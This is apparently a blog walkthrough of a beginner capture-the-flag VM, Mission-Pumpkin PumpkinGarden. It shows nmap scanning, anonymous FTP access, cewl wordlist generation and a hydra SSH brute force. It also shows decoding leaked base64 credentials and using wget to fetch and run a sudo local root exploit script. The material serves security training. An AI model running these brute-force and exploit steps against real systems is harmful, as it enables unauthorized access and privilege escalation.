Mission-Pumpkin v1.0 is a beginner level CTF series, created by me by keeping absolute* beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. My initial thought of creating this CTF series is to encourage beginners to learn the concepts by solving problems.
Here is the walkthrough for PumpkinGarden, Level 1 in the series of Mission-Pumpkin. As like all other CTF or Boot2Root challenges, the end goal is to find PumpkinGarden_key (file) placed in the root user account.
You can download the VM (.ova) from here
Upon booting the machine the welcome banner displays the IP address so no need to perform network scan.
At first, let’s perform nmap scan to identify services running on the machine.
root@kali:~# nmap -p- -A 192.168.1.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-14 11:06 IST
Nmap scan report for 192.168.1.102
Host is up (0.00039s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.107
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
| 2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
| 256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_ 256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (ED25519)
MAC Address: 08:00:27:5C:1B:D9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.1.102OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.19 seconds
Nmap helped us identify 3 services FTP, SSH, HTTP. Let’s try for low hanging fruits first, anonymous FTP login is allowed let’s login with username as anonymous and a blank password
root@kali:~# ftp 192.168.1.102
Connected to 192.168.1.102.
220 Welcome to Pumpkin’s FTP service.
Name (192.168.1.102:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r — r — 1 0 0 88 Jun 8 00:02 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (88 bytes).
226 Transfer complete.
88 bytes received in 0.00 secs (51.1228 kB/s)
ftp> bye
221 Goodbye.We found a note.txt file let’s read the contents of it.
root@kali:~# cat note.txt
Hello Dear!
Looking for route map to pumpkin garden? I think jack can help you find it.Based on the note, we found that jack can help us. So, let’s get back to the list of services running on the machine. I think we can log in to SSH as jack. But we don’t have any clue on the password. so let’s try to create a wordlist using cewl to brute force ssh login. cewl can help us retrieve words from the website running on port 1515 (HTTP).
cewl http://192.168.1.102:1515 -w wordlist.txtNow that we are ready with the wordlist, let’s brute force the port 3535 (SSH) using hydra.
hydra -l jack -P wordlist.txt ssh://192.168.1.102 -s 3535
We found the SSH login for jack. Let’s log in to SSH as jack.
root@kali:~# ssh -p 3535 jack@192.168.1.102
--------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
--------------------------------------------------------------------
jack@192.168.1.102's password:
Last login: Thu Jun 8 00:58:39 2019
jack@Pumpkin:~$ ls
note.txt
jack@Pumpkin:~$ cat note.txtAre you here for keys to pumpkin garden?
I'm afraid that scarecrow has just stolen the keys from me...
Again we found a note.txt after logging in as jack with a clue to contact scarecrow. The only option we have is to search for the next clue on the website.
under the hood? 🤔 let’s view the page source.
The comment written in the page source wanted us to search for the next clue in pumpkin images. We can use dirb to enumerate web directories.
root@kali:~# dirb http://192.168.1.102:1515
— — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612— — Scanning URL: http://192.168.1.102:1515/ — —
==> DIRECTORY: http://192.168.1.102:1515/img/
+ http://192.168.1.102:1515/index.html (CODE:200|SIZE:903)
+ http://192.168.1.102:1515/server-status (CODE:403|SIZE:295)
— — Entering directory: http://192.168.1.102:1515/img/ — —
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)
We are allowed to list img directory contents.
In this location, the hidden_secrect directory contains a clue.txt file. Content of this file is a base64 encoded string. Let’s decode.
root@kali:~# echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d
scarecrow : 5Qn@$ylooks like username : password
We got details of the scarecrow. Let’s login to SSH with above details.
root@kali:~# ssh -p 3535 scarecrow@192.168.1.102
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
scarecrow@192.168.1.102’s password:
Last login: Thu Jun 8 00:35:51 2019 from 192.168.1.106
scarecrow@Pumpkin:~$ ls
note.txt
scarecrow@Pumpkin:~$ cat note.txtOops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)!
Reach out to goblin and share this “Y0n$M4sy3D1t” to secretly get keys from LordPumpkin.
Again we found a note.txt file after logging in as scarecrow with a clue to contact goblin and share Y0n$ M4sy3D1t. Let’s login to SSH with these details.
root@kali:~# ssh -p 3535 goblin@192.168.1.102
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
goblin@192.168.1.102’s password:
Last login: Thu Jun 8 00:43:14 2019 from 192.168.1.106
goblin@Pumpkin:~$ ls
note
goblin@Pumpkin:~$ cat noteHello Friend! I heard that you are looking for PumpkinGarden key.
But Key to the garden will be with LordPumpkin(ROOT user), don’t worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh
Finally, we reached a place where we found a way to gain root access. Its time to escalate privileges. Click here to understand the details about the vulnerability.
Let’s download the exploit code from the given link using wget
wget https://www.securityfocus.com/data/vulnerabilities/exploits/38362.shWe need to make the file executable before we run the script to gain root access.
goblin@Pumpkin:~$ chmod +x 38362.sh
goblin@Pumpkin:~$ ./38362.sh 38362.sh
Tod Miller Sudo local root exploit
by Slouching
automated by kingcope
ALEX-ALEX
root@Pumpkin:/tmp# cd
root@Pumpkin:~# ls
PumpkinGarden_Key
root@Pumpkin:~# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:~# echo Q29uZ3JhdHVsYXRpb25zIQ== | base64 -d
Congratulations!Yippee! finally, we found the key to PumpkinGarden
There are so many other ways to reach this point in a short time, but my intention is to cover as many techniques as possible. Thanks for your interest in taking time to root this machine. I’ll be back soon with a walkthrough for Mission-Pumpkin v1.0 level 2.
Have you enjoyed rooting this machine then give it a 👏 I love to hear from you. Drop your feedback and suggestions in the comments.
